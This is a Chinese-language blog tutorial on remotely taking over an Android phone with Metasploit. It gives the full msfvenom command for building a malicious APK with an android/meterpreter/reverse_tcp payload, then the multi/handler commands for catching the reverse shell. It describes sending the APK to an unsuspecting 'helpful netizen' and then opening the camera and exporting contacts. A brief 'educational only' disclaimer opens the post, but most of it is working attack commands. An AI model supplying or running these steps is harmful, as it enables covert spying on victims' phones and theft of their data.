相关声明
本教程仅作为Metasploit教育目的,请勿用于非法用途。
相关阅读
原理依旧是Reverse shell(反弹shell),我们之前讲过,您可以翻阅之前的视频,之前是反弹shell控制计算机,今天是控制手机,思路是一致的
工具准备
以下教程需要使用到Metasploit框架,您可以使用windows安装专业版,也可以使用Kali linux里自带的社区版
视频教程
图文教程
其实视频里并没有详细讲解恶意的APK文件MainActivity.apk
是怎么生成的,我们在图文教程里做一个补充
生成APK文件
我们可以先查看有哪些payload
msfvenom -l payloads
我们可以看到有592个payload,我们只用andriod/meterpreter/reverse_tcp
![图片[1]-Metasploit框架远程控制入侵手机教程-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/03/20220311142240111.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
生成恶意文件需要包括IP、端口,如果你不知道IP是多少可以使用下面的命令查看
ip addr
我们的IP地址是192.168.244.128
![图片[2]-Metasploit框架远程控制入侵手机教程-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/03/20220311095543801.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
生成恶意APK文件的方法如下:
192.168.244.128
是我的kali linux虚拟机的IP地址4445
是我随机选的端口fancypig.apk
是我生成apk文件
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.244.128 LPORT=4445 R > fancypig.apk
这里可以看到已经生成好了
![图片[3]-Metasploit框架远程控制入侵手机教程-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/03/20220311142714457.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
我们需要做的是将其发给热心网友
远程控制
发送之后,我们先启动metasploit渗透框架
msfconsole
![图片[4]-Metasploit框架远程控制入侵手机教程-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/03/20220311095041757.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
use exploit/multi/handler
然后我们这里选择使用andriod反弹shell的模块
set payload /android/meterpreter/reverse_tcp
然后我们需要在这里设置IP地址,我们这里是内网环境,因此我需要先查看我的IP地址
因此回到一开始我们打开的终端,下面的命令要这么输入
set LHOST 192.168.244.128
端口的话我们这里设置的是4445
set LPORT 4445
然后,我们输入
exploit
如果热心网友的手机运行了软件,我们后面就可以进行更多的骚操作了!
譬如,打开摄像头、导出联系人等等
© 版权声明
THE END
- 最新
- 最热
只看作者